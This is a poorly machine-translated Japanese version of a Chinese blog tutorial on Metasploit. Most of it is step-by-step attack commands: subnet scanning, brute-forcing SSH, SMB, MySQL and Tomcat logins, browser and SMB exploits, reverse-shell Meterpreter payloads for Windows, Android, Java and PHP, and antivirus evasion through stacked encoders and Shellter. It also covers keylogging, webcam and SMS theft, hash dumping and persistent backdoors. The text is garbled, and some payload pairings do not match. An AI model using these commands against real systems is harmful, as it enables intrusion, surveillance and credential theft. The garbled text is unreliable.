ネットワークセキュリティ(9バッファオーバーフロー&& Metasploitの)

過剰の水としてカップに注ぎ、バッファオーバフローが、以上のバッファのデータ記憶容量を提供されることを意味します。

読み書き期間として記憶領域をバッファより抽象的に理解することができる、
攻撃の究極の目標は、意図的に悪意のあるコードの設定されているこの読み書きメモリを実行するために、システムバッファが望まれます。

安全な使用して文字列操作関数
書き込みセキュリティコードの
入力データの検証(フィルタリング)
をチェックポインタの整合性
パーティのソフトウェア防衛を


侵入攻撃(エクスプロイト)
テスターは、プロセスのシステム、プログラム、またはサービスの攻撃の抜け穴を使用

攻撃負荷(ペイロード)
部分を攻撃する攻撃者のコードがターゲット・システム上で実行され、リバウンド接続を有するコードを変更し、他のシステムのコマンドの機能を実行するために、ユーザを作成します

シェルコードの
ターゲットマシン上で実行することを機械語命令の期間は、シェルの実行が成功した後に戻ります

モジュール(Module1が)
フレームMetasploitのに使用されるソフトウェア・コード・コンポーネントの部分を指し

リスナー(リスナー)
リスナー組立Metasploitのアクセスネットワーク接続を待つことです

データベース・サービスのPostgreSQL statrを開きます。

データベースの状態、サービスのPostgreSQLの状態を確認

ファイル名を指定して実行msfconsole

データベース接続の状態db_connectを見ます

テーブルワークスペース-aテストを作成します。

削除するには、テーブル作業領域 - Dテスト

テストベンチWordspaceテストを入力します。

nmapのdb_nmap -sS 192.168.80.1スキャンホストを使用します

1.xmlのdb_exportスキャン結果のエクスポート
1.xml db_import輸入スキャン結果を

スキャン結果のホストを見ます


情報収集

オープンmsfconsole

  1. whoisのwww.example.com
  2. nslookupコマンド

利用補助/スキャナ/ IP / ipidseq #IPID シーケンススキャナ、および-Si nmapの-Oオプションはに似て
表示オプション
のSETのrhosts 192.168.1.0/24
SET RPORT 8080
SETスレッド50
RUN

nmapのデータベース接続をスキャン
db_nmap -sS -A 192.168.2.123

db_servicesはスキャン結果を表示します

使用ポートスキャン模块
ポストスキャン検索
使用を補助/スキャナ/ポストスキャン/シン
設定のrhosts 192.168.1.111
セットTHREADS 50
実行

Smb_version特定の走査モジュール:
利用補助/スキャナ/ SMB / smb_version IPオープンポート445を見つける
表示オプション
のSETのrhosts 192.168.1.111
SETスレッド50
RUNの
db_hosts -cアドレス、os_flavor

找MSSQL主机
使用補助/スキャナ/ MSSQL / mssql_ping
ショーのオプションが
のrhosts 192.168.1.0/24設定し
、設定されたスレッドを255
実行

Eメールアドレス検索サイト
search_email_collectorの
利用補助/収集/ search_email_collector
SET DOMAIN cracer.com(スキャン領域)
RUN

SSHスキャンサーバの
利用補助/スキャナ/ SSH / ssh_version
のSETのrhosts 192.168.1.0/24
SETスレッド50
RUN

テルネット服务
使用補助/スキャナ/テルネット/ telnet_version
設定のrhosts 192.168.1.0/24
セットスレッド50
ラン

FTPホストスキャンは
補助/スキャナ/ FTP / ftp_version使用
表示オプション
のSETのrhostsに192.168.1.0/24
SETスレッド50
RUNを

匿名FTPログイン掃引
使用を補助/スキャナ/ FTP / anonymos
表示オプション
のSETのrhosts 192.168.1.0/24
SETスレッド50
RUN

匿名FTPログイン
ログイン名:匿名
パスワード:空

ホストが生き残ったローカル・エリア・ネットワークスキャン
arp_sweep利用補助/スキャナ/ディスカバリー/
表示オプション
のSETのrhosts 192.168.1.0/24
SETスレッド50
RUNを

スキャンウェブディレクトリ(としないスキャンファイル)
を使用補助/スキャナ/ HTTP / dir_scanner
表示オプション
のSETのrhostsに192.168.1.129
SETスレッド50
RUN

扫描SNMP主机
利用補助/スキャナ/ SNMP / snmp_login
オプションを表示は
のrhosts 192.168.1.0/24設定し
、設定されたTHREADS 50
実行を

Etherealのスニファ
利用補助/スニファ/ psnuffle
RUN


パスワードブラスト

SSH密码
ssh_login検索
使用を補助/スキャナ/ SSH / ssh_login
のオプションが表示さ
のrhosts 192.168.2.231に設定
セットPASS_FILEパス
セットUSERNAMEルートを
活用します

telnetの密码
検索telnet_loginの
/スキャナ/ telnetの/ telnet_login auxiliray使用
を示してオプションが
設定のrhosts 192.168.2.123
セットFILE_PATHパス
セットUSERNAME管理者が
利用します

サンバ攻击
使用補助/スキャナ/ SMB / smb_login
設定のrhosts 192.168.2.3
セットPASS_FILEパス
セットSMBUser管理者
セットスレッド50が
悪用

MySQLの密码爆破
mysql_login検索
使用を補助/スキャナ/ MySQLの/ mysql_login
設定のrhosts 192.168.1.32
セットPASS_FILEパス
設定USERNAMEルート
セットスレッド50が
悪用

postgresql_login検索
使用を補助/スキャナ/ postgresの/ postgres_login
ショーのオプションが
のrhosts 192.168.2.129に設定
PASS_FILEパスセット
セットUSERNAMEのはpostgres
活用を

Tomcatの攻击
tomcat_mgr_login検索
ショーのオプションが
補助/スキャナ/ HTTP / tomcat_mgr_login使用
セットが192.168.1.23のrhosts
/root/pass.txtセットPASS_FILE
/root/user.txtセットUSER_FILE
活用を


モジュールを活用

ショーのターゲットは、ターゲットを表示(OSバージョン)

目標を設定設定した目標バージョン

攻撃への脆弱性を悪用し始めました

セッション-lリストのセッション

セッションのセッションを選択します-i

セッション-kセッションの終了

背景Zでの会話

Cセッションが終了

補助ディスプレイ補助モジュールを表示

補助モジュールを使用します

設定したセットアップオプション

実行実行モジュール

ms10_002
検索ms10_002
使用悪用/ Windowsの/ブラウザ/ ms10_002_aurora
表示オプション
のSET SRVHOST 192.168.2.128(悪意のあるURL生成IP(缶プロキシ))
SETペイロードのWindows / Meterpreter / reverse_tcp(バウンスシェル)
のSET SRVPORT 80(ポートへのバウンスバック)
SET uripath /
192.168.2.128 lhost SET(アドレスのリスニング)
(リスニングポート用)SET lportは1211
エクスプロイト

セッション-i(セッションがあるかどうかを確認)

セッション-i 1(IDを選択し、セッションに入る)
を直接シェルは、シェルを得ることができる入力

ms10_018
ms10_018検索
の使用を悪用/窓/ブラウザ/ ms10_018_ie_behaviorsは
オプションを示し
SRVHOST 192.168.2.128に設定
セットSRVPORT 8081
セットのペイロード・ウィンドウ/シェル/ reverse_tcp
セットLHOST 192.168.2.128
セットlportは1211が
活用を

セッション-i(セッションがあるかどうかを確認)

セッション-i 1(選択ID、セッションに)

異なるペイロードので、直接シェルに、このように

ms12_020
検索ms12_020
補助/スキャナ/ RDB / ms12_020_check(ms12_020脆弱性のチェック)使用
の表示オプション
のSETのrhosts 192.168.2.0/24
SETスレッド50

バック

使用補助/ DOS / Windowsの/ RDP / ms12_020_maxchannelidsは
オプションが表示さ
RHOST 192.168.2.132設定
の実行を

ms10_046
ms10_046検索
の使用を悪用/窓/ブラウザ/ ms10_046_shortcut_icon_dllloader
ショーオプション
SRBHOST 192.168.2.128を設定
セットのペイロード・ウィンドウ/シェル/ reverse_tcp
セットLHOST 192.168.2.128
セットlportは1213年には、
エクスプロイト

ms08_067
ms08_067検索
の使用を悪用/窓/ SMB / ms08_067_netapiの
ショーのオプションは
RHOST 192.168.2.131に設定
セットのペイロード窓/ meterpreter / reverse_tcp
セットLHOST 192.168.2.128
セットlportは1215
ショーのターゲット
34は、設定された目標を
活用します


シェルコード

ウィンドウズ

生成shellcode
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe

监听shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

Linuxの

生成shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer


监听shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

Andriod

生成shellcode
msfpayload android/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk


监听shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

dump_contacts   导出电话
dump_sms        导出信息
Webcam_list	摄像头数目
-i 1		后置摄像头
webcam_snap 	拍照
webcam_stream	开启摄像头

ジャワ

生成shellcode
msfpayload java/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar


监听shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1125

将生成得shellcode上传到目标机上

exploit

将生成得cracer.jar运行起来:
	    Java -jar cracer.jar运行起来

PHP

成shellcode
msfpayload php/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 R > cracer.php


监听shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

シェル無料殺害を避けるために殺すために

使用多重编码免杀
msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe

殺すために自由パッカー
UPX -5 cc.exeを

キルへの無料ベール

shellter無料ツール殺すために
注入ツールのシェルコードを
いくつかの正常なツールでは、殺すために自由を達成するために、いくつかの穴を注入しています

  1. まず、生成するMetasploitのペイロード
    msfvenom -pのWindows / Meterpreter / reverse_tcp lhost 1337 = -e = 192.168.1.3 lportは/ 43のx86はshikata_ga_nai -i -f -o RAW fud.rawあります
  2. ワインは、赤ワインのボトルと私たちshellterを実行shellter.exe行い、
  3. Aは、私たちはEXEファイルの場所を殺す避けるために、プレ噴射を実行する準備ができていることを自動モード、PEターゲットを表し
  4. ここでは、負荷入力L、ここで我々が使用meterpreter_reverse_tcp負荷、入力1を起動するコマンドを選択します
  5. 私たちのラリーシェルの場所を入力し、私たちが聞くために必要なローカルポートを入力して、ここで私は、リスニングポートとして1355を選択しました、入る直接生成
  6. 启动Metasploitの监听
    msfconsole
    使用は/マルチ/ハンドラ活用
    セットペイロードの窓/ meterpreter / reverse_tcp
    192.168.1.3 lhostセット
    1355 lportはセットを
    利用します
  7. ファイルディレクトリを生成し、聞くために開始した後、Windowsコンピュータで実行するメインライン上に配置しました

浸透した後、

トロイの木馬作成1.
Windowsの/ Meterpreter / reverse_tcp lhost 192.168.2.133 lportは= X-1121> /root/cracer.exe msfpaylaod
2.リスニング
使用悪用/マルチ/ハンドラ
SETペイロードのWindows / Meterpreterを/ reverse_tcp
SET 192.168.2.133 lhost
SETのlportは1233年には、
エクスプロイト
ターゲットマシンの実行にトロイの木馬を

  1. 操作コマンド

あなたは、メインフォルダに画面キャプチャスクリーンショットの画像を生成する必要があります

プラットフォームSYSINFO実行収集システム

キーロガーを取得
開始keyscan_start
keyscan_dump出力
keyscan_stopの終わりを

psのチェック処理

1774のハンドオーバ処理を移行することは(成功の侵略は、プログラムがシャットダウンされた場合でも、制御されるように、最初は安定への切り替えのプロセスを取得することですターゲットにしました)

実行ポスト/窓/キャプチャ/ keylog_recorderレコードキーロガー

ハッシュ---- hashdumpを取得

ログのハッシュ使用して
の使用を悪用/ Windwows / SMB / PsExecは
SETペイロードwindwos / metpreter / reverse_tcp
192.168.2.133 lhost SET
SETは192.168.2.131(ターゲット)をrhost
表示オプション
SET lportは1212
SETのsmbuser管理者にこれらの値smbpass smbuser得ることができ、ハッシュ取得
SETをasdasdqwsda1313 smbpass
表示オプションを
利用します

プロセスマイグレーション実行後/窓/管理/移行 ( 自己安定化プロセスへの切り替え)
RUN killav近いCMD.EXEの
ビューの目標すべてのトラフィックラン-i 1つのpacketrecorder
抽出情報システムは、スクレーパーを実行

PC(カイからブート)の持続的な制御
RUN永続-X 50 -i -p 1121 -r 192.168.2.133(目標は、いくつかのレジストリデータを書き込むことがありました)

msfcosoleの
使用は、マルチ/ハンドラ/悪用し
、設定されたペイロードの窓/ meterpreter / reverse_tcp
セットlportは1121
セットLHOST 192.168.2.133を
悪用し
たセッション-u 2升级シェル变成meterpreterを

常設制御サーバ

msfpaylaod窓/ meterpreter / reverse_tcp LHOST = 192.168.2.133 lportは= 1127 X> /root/cracer.exe
与えるために、宛先マシン上でペイロードを生成します

msfcosoleの
使用は、マルチ/ハンドラ/悪用し
、設定されたペイロードの窓/ meterpreter / metsvc_bin_tcp
セットlportは1121
セットLHOST 192.168.2.133を
活用します

ランペイロード

metsvc -A //永続的インストールバックドアを実行します

再起動後
msfcosole
使用エクスプロイト/マルチ/ハンドラ
SETペイロードのWindows / metsvc_bind_tcp
SETは、192.168.2.132をrhost
SET lportは31337 //固定受けるポートを
利用します

公開された17元の記事 ウォンの賞賛2 ビュー3520

おすすめ

転載: blog.csdn.net/Aidang/article/details/97888442